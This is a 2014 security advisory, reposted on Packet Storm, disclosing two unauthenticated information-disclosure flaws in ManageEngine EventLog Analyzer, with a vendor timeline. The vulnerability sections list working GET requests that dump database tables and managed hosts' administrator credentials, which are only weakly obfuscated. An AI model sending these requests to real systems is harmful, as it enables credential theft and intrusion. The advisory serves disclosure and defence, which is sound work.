exploit the possibilities

ManageEngine EventLog Analyzer SQL / Credential Disclosure

ManageEngine EventLog Analyzer SQL / Credential Disclosure
Posted Nov 6, 2014
Authored by Pedro Ribeiro

ManageEngine EventLog Analyzer suffers from SQL information and credential disclosure vulnerabilities.

tags | exploit, vulnerability, info disclosure
advisories | CVE-2014-6038, CVE-2014-6039
SHA-256 | ae0902d2d1251e6a705e5a528c9450f71f486b0f84a93f3094c7c09f8e7737f8

ManageEngine EventLog Analyzer SQL / Credential Disclosure

Change Mirror Download
Hi,

This is the 6th part of the ManageOwnage series. For previous parts see [1].

This time we have two 0 day vulns (CVE-2014-6038 and 6039) that can be
abused to dump information from the database and obtain the superuser
credentials for Windows and AS/400 hosts which are managed by EventLog
Analyzer. A Metasploit module has also been released and should be
integrated in the framework in the next few days [2].

I'm releasing these as a 0 day since it's been 70 days since I
informed ManageEngine of this vulnerability and they have been
twiddling their thumbs ever since. The last update I got was that they
were "working on fixing it but couldn't commit to a date; the
tentative date is end of the year".
Since they have been vulnerable to a more serious remote code
execution 0 day for 67 days now (see [3]), I'm not holding this any
longer.

Details and timeline of disclosure are below, and a copy of this
advisory can be found at my repo [4].

Regards,
Pedro

>> Multiple vulnerabilities in ManageEngine EventLog Analyzer
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 05/11/2014 / Last updated: 05/11/2014

>> Background on the affected product:
"EventLog Analyzer provides the most cost-effective Security
Information and Event Management (SIEM) software on the market. Using
this Log Analyzer software, organizations can automate the entire
process of managing terabytes of machine generated logs by collecting,
analyzing, correlating, searching, reporting, and archiving from one
central location. This event log analyzer software helps to monitor
file integrity, conduct log forensics analysis, monitor privileged
users and comply to different compliance regulatory bodies by
intelligently analyzing your logs and instantly generating a variety
of reports like user activity reports, historical trend reports, and
more."

A Metasploit exploit that abuses these two vulnerabilities to obtain
the managed device superuser credentials has been released.

#1
Vulnerability: SQL database information disclosure (read any table in
the database)
CVE-2014-6038
Constraints: none; no authentication or any other information needed.
On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.

GET /agentHandler?mode=getTableData&table=[tableName]
GET /agentHandler?mode=getTableData&table=AaaUser --> user logins
GET /agentHandler?mode=getTableData&table=AaaPassword --> user
passwords (MD5 hashed) and salts
GET /agentHandler?mode=getTableData&table=AaaPasswordHint --> user
password hints
GET /agentHandler?mode=getTableData&table=HostDetails --> Windows /
AS/400 managed hosts Administrator usernames and passwords (XOR'ed
with 0x30)


#2
Vulnerability: Windows / AS/400 managed hosts Administrator
credentials disclosure
CVE-2014-6039
Constraints: none; no authentication or any other information needed.
On v7 the url has to be prepended with /event/.
Affected versions: all versions from v7 to v9.9 build 9002.

GET /hostdetails?slid=X&hostid=Y
GET /hostdetails?slid=1&hostid=1 --> Windows / AS/400 hosts superuser
username and password (XOR'ed with 0x30 and base64 encoded)


>> Fix:
UNFIXED - ManageEngine failed to take action after 70 days.

Timeline of disclosure:
28/08/2014
- Requested contact to email via ManageEngine Security Response Center
- Received email from support and sent details about the
vulnerabilities above and a third vulnerability (remote code execution
via file upload).

28/08/2014
- ManageEngine acknowledge the receipt and promise to keep me informed
of the progress.

31/08/2014
- hong10 releases details about the remote code execution via file
upload vulnerability which I had discovered. Apparently he discovered
and communicated it to ManageEngine over a year ago and no action had
been taken (see http://seclists.org/fulldisclosure/2014/Aug/86).
- I ask ManageEngine why I hadn't been informed that one of my
vulnerabilities had already been disclosed to them over a year ago.
They respond with "We appreciate your efforts and will fix your
vulnerabilities, please bear with us".
- With hong10's support, I release an exploit for the remote code
execution vulnerability (see
http://seclists.org/fulldisclosure/2014/Aug/88). I also remove the
vulnerability information from this report since it has already been
discovered and disclosed by hong10.

11/09/2014
- Asked for an update on progress. Received a response a day after
"the development team will include the fix in our next release".

13/10/2014
- Asked for an update on progress. No response.

17/10/2014
- Informed ManageEngine that will release details and an exploit the
next day if no reply is received.

19/10/2014
- Attempted escalation via the project manager for Desktop Central.
EventLog support team replies on the next day apologising for not
responding and saying will get back to me as soon as possible.

05/11/2014
- Informed EventLog support that would release details and exploit
today. Received reply stating "we are working on this but cannot
commit to a date; the new version has a tentative release date of end
of quarter".
- Released advisory and exploit 70 days after initial contact
(interesting fact: it's been 67 days since the release of my exploit
for hong10's vulnerability and EventLog Analyzer is still vulnerable
to remote code execution).


[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110

[2]
https://github.com/rapid7/metasploit-framework/pull/4137

[3]
http://seclists.org/fulldisclosure/2014/Aug/88

[4]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    12 Files
  • 27
    May 27th
    12 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close